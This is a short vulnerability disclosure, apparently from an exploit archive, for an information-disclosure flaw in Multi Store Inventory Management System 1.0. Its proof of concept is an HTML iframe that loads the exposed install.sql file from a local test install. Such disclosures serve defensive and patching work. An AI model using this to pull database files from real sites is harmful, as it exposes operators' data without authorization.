# Exploit Title: Multi Store Inventory Management System - Information Disclosure # Date: 04/04/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.bdtask.com/ # Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/ # Version: 1.0 # Tested on: XAMPP, Windows 10 # Contact: https://twitter.com/dmaral3noz # Description : The application allows directory listing and information disclosure of some sensitive files that can allow an attacker to leverage the disclosed information. ################################################ PoC Html : <html> <head><body> <title>Multi Store Inventory Management System - Information Disclosure</title> <iframe src=http://127.0.0.1/multistore_demo/install/sql/install.sql> </body></head> <html>